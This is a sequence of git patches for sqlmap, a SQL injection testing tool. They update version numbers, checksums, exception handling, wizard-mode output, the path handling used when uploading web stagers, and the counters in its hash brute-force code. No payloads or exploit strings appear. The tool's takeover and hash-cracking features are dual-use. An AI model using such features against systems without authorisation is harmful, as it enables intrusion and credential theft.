1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -17ab0324cb992a781cc197ec8c0209d7 lib/core/common.py +32a77cc3fc2d26d26f469ab8eb35efed lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7735e472a2d2661744bd6d04fd1c387d lib/core/settings.py +feb9124da962dd30ab7fcecc4a60f5d3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 24cc6e92e949125e486401d80c204025367f6b1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Feb 2018 14:26:31 +0100 Subject: [PATCH 037/428] Trivial update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f81cb1df979..5b74d90eec8 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3307,7 +3307,7 @@ def unhandledExceptionMessage(): errMsg += "reproduce the bug. The " errMsg += "developers will try to reproduce the bug, fix it accordingly " errMsg += "and get back to you\n" - errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] + errMsg += "Running version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION errMsg += "Operating system: %s\n" % platform.platform() errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) diff --git a/lib/core/settings.py b/lib/core/settings.py index 625e335ec7f..dafa1d54238 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.14" +VERSION = "1.2.2.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3a13b83de66..42cdfa958b4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -32a77cc3fc2d26d26f469ab8eb35efed lib/core/common.py +62580fa31d29a79aa1e4715e425a147c lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -feb9124da962dd30ab7fcecc4a60f5d3 lib/core/settings.py +0c204b9aa8cc9637a6ef495ea603935e lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 67f8c22702b0494881dbc890027892ca8c925460 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 21 Feb 2018 11:47:01 +0100 Subject: [PATCH 038/428] Fixes #2942 --- lib/core/option.py | 5 ++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index e3ace6ec65f..d2dc4eaf17f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1648,7 +1648,10 @@ def _cleanupOptions(): conf.rParam = [] if conf.paramDel and '\\' in conf.paramDel: - conf.paramDel = conf.paramDel.decode("string_escape") + try: + conf.paramDel = conf.paramDel.decode("string_escape") + except ValueError: + pass if conf.skip: conf.skip = conf.skip.replace(" ", "") diff --git a/lib/core/settings.py b/lib/core/settings.py index dafa1d54238..e5eba1210ce 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.15" +VERSION = "1.2.2.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 42cdfa958b4..7a705fc3f36 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -785746cab318fe550d98c37296a0a888 lib/core/option.py +12f9b2435f4967562770be248cf50843 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0c204b9aa8cc9637a6ef495ea603935e lib/core/settings.py +f80eeded0ed77a678dd7a69d6a8fd3ae lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From b595b883d1bdc3815de29fb900d551a1c405e604 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 25 Feb 2018 17:39:21 +0100 Subject: [PATCH 039/428] Temporary patch for #2947 --- lib/core/settings.py | 2 +- sqlmap.py | 8 ++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e5eba1210ce..4b9a44d4c29 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.16" +VERSION = "1.2.2.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 0c1e160f8fa..d8c236da193 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -297,6 +297,14 @@ def main(): logger.error(errMsg) raise SystemExit + elif "url = url.strip()" in excMsg: + dataToStdout(excMsg) + print + errMsg = "please contact 'miroslav@sqlmap.org' with details for this issue " + errMsg += "as he is trying to reproduce it for long time" + logger.error(errMsg) + raise SystemExit + elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): raise SystemExit diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7a705fc3f36..21877d09f89 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f80eeded0ed77a678dd7a69d6a8fd3ae lib/core/settings.py +616fd4427943e75033dcf128e11fcaff lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -3e2e790c370442c3d98eaa88a3523b15 sqlmap.py +082aa29ab77c647a0d3830c07279d437 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 93859fdc42836ce0b837dd9bd86b1fdcef9db52f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Feb 2018 13:37:19 +0100 Subject: [PATCH 040/428] Fixes #2948 --- lib/core/settings.py | 2 +- thirdparty/clientform/clientform.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4b9a44d4c29..0c5ed00b34c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.17" +VERSION = "1.2.2.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/clientform/clientform.py b/thirdparty/clientform/clientform.py index 2c2a25f1496..59d2d59ca65 100644 --- a/thirdparty/clientform/clientform.py +++ b/thirdparty/clientform/clientform.py @@ -2455,7 +2455,7 @@ def __init__(self, type, name, attrs, index=None): # IE5 defaults SUBMIT value to "Submit Query"; Firebird 0.6 leaves it # blank, Konqueror 3.1 defaults to "Submit". HTML spec. doesn't seem # to define this. - if self.value is None and not self.disabled: self.value = "" + if self.value is None and not self.disabled and not self.readonly: self.value = "" self.readonly = True def get_labels(self): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 21877d09f89..aca0595c90e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -616fd4427943e75033dcf128e11fcaff lib/core/settings.py +94fc756abb87d40cc78a9a26232b9136 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -326,7 +326,7 @@ ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py 6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py -658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py +3c1b0d627e98643b317244ecfd240bb5 thirdparty/clientform/clientform.py 722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py 0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py 93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py From d99151ce5a59d2f3ed8cc4dce97d5c0832df50f8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:37:45 +0100 Subject: [PATCH 041/428] Minor update for --wizard mode --- lib/controller/controller.py | 3 +++ lib/core/common.py | 8 ++++---- lib/core/option.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 15 insertions(+), 9 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 298fca10651..27708c86784 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -158,6 +158,9 @@ def _formatInjection(inj): return data def _showInjections(): + if conf.wizard and kb.wizardMode: + kb.wizardMode = False + if kb.testQueryCount > 0: header = "sqlmap identified the following injection point(s) with " header += "a total of %d HTTP(s) requests" % kb.testQueryCount diff --git a/lib/core/common.py b/lib/core/common.py index 5b74d90eec8..6b36d1ec02f 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -912,7 +912,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= message = "" if not kb.get("threadException"): - if forceOutput or not getCurrentThreadData().disableStdOut: + if forceOutput or not (getCurrentThreadData().disableStdOut or kb.get("wizardMode")): if kb.get("multiThreadMode"): logging._acquireLock() @@ -1018,7 +1018,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) if retVal: - dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=True, bold=True) + dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the given answer" logger.debug(debugMsg) @@ -1032,7 +1032,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): else: options = unicode() - dataToStdout("\r%s%s\n" % (message, options), forceOutput=True, bold=True) + dataToStdout("\r%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the default behavior, running in batch mode" logger.debug(debugMsg) @@ -1045,7 +1045,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): if conf.get("beep"): beep() - dataToStdout("\r%s" % message, forceOutput=True, bold=True) + dataToStdout("\r%s" % message, forceOutput=not kb.wizardMode, bold=True) kb.prependFlag = False retVal = raw_input().strip() or default diff --git a/lib/core/option.py b/lib/core/option.py index d2dc4eaf17f..0cfc3caa19d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2038,6 +2038,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.uChar = NULL kb.unionDuplicates = False kb.wafSpecificResponse = None + kb.wizardMode = False kb.xpCmdshellAvailable = False if flushAll: @@ -2119,6 +2120,8 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") + kb.wizardMode = True + def _saveConfig(): """ Saves the command line options to a sqlmap configuration INI file diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c5ed00b34c..0f1f3aecd80 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.18" +VERSION = "1.2.2.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aca0595c90e..721d36e6944 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,12 +22,12 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py -f0e3f93f6a5275812e4d0c3e3a2a3701 lib/controller/controller.py +9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -62580fa31d29a79aa1e4715e425a147c lib/core/common.py +863d9c00a7684db29005705d6dcc36b9 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -12f9b2435f4967562770be248cf50843 lib/core/option.py +a377168b153725d3677924040b7861f4 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -94fc756abb87d40cc78a9a26232b9136 lib/core/settings.py +56665472f845f83f11d802dfc422dce5 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 9df16f3eb21d60883d9375bb999768c562a19a3f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:49:05 +0100 Subject: [PATCH 042/428] Bug fix (regex for paths included full error message) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0f1f3aecd80..b0fd326d615 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.19" +VERSION = "1.2.2.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -316,7 +316,7 @@ SESSION_SQLITE_FILE = "session.sqlite" # Regular expressions used for finding file paths in error messages -FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"(?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"href=['\"]file://(?P/[^'\"]+)") +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"in (?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"href=['\"]file://(?P/[^'\"]+)") # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 721d36e6944..7e27069772f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -56665472f845f83f11d802dfc422dce5 lib/core/settings.py +a9fdac60617e8496fd19c9d9449b3de7 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From b25f2bfa456fb8e44bbb4ffb644ca36421fae1b7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:57:48 +0100 Subject: [PATCH 043/428] Minor patch (not not upload to / directories) --- lib/core/settings.py | 2 +- lib/takeover/web.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b0fd326d615..d764185be53 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.20" +VERSION = "1.2.2.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2395b06b22b..617d67a5ad1 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -259,6 +259,7 @@ def webInit(self): directories = list(oset(directories)) path = urlparse.urlparse(conf.url).path or '/' + path = re.sub(r"/[^/]*\.\w+\Z", '/', path) if path != '/': _ = [] for directory in directories: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7e27069772f..92d4192fa3e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a9fdac60617e8496fd19c9d9449b3de7 lib/core/settings.py +781efdc7fb3d938985783a00d9932616 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -19d2b9d1159ce809907ba71c4fae0d4e lib/takeover/web.py +746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py From 6402d2ec57599647eea3d50e3e0f0d3985cd038c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Feb 2018 09:44:45 +0100 Subject: [PATCH 044/428] Fixes #2952 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d764185be53..452e5f585d9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.21" +VERSION = "1.2.2.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index bafe2a80138..7548c29fde3 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -16,6 +16,9 @@ # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) _ = multiprocessing.Queue() + + # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952) + _ = multiprocessing.Value('i') except (ImportError, OSError): pass else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 92d4192fa3e..6ca78d76626 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -781efdc7fb3d938985783a00d9932616 lib/core/settings.py +5c87716f367de486b4e26974517f95cb lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -105,7 +105,7 @@ a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py +56b62f4d8811f42b45b5f2f8e6e0a99e lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From ec6de40a8ddda284f1be61c6ec9a2f69b9a290c3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Mar 2018 23:38:07 +0100 Subject: [PATCH 045/428] Fixes #2958 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 7 ++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 452e5f585d9..e6b2c979a6d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.22" +VERSION = "1.2.3.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 7548c29fde3..508d3a9ca5b 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -722,6 +722,8 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if not attack_info: break + count += 1 + if not isinstance(word, basestring): continue @@ -731,8 +733,6 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc try: current = __functions__[hash_regex](password=word, uppercase=False) - count += 1 - if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item @@ -797,7 +797,6 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if found.value: break - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): @@ -807,6 +806,8 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found word = word + suffix try: + current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) + if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6ca78d76626..61684682238 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5c87716f367de486b4e26974517f95cb lib/core/settings.py +ae4670ba5c8569d10ae0a55f2284f11e lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -105,7 +105,7 @@ a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -56b62f4d8811f42b45b5f2f8e6e0a99e lib/utils/hash.py +55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 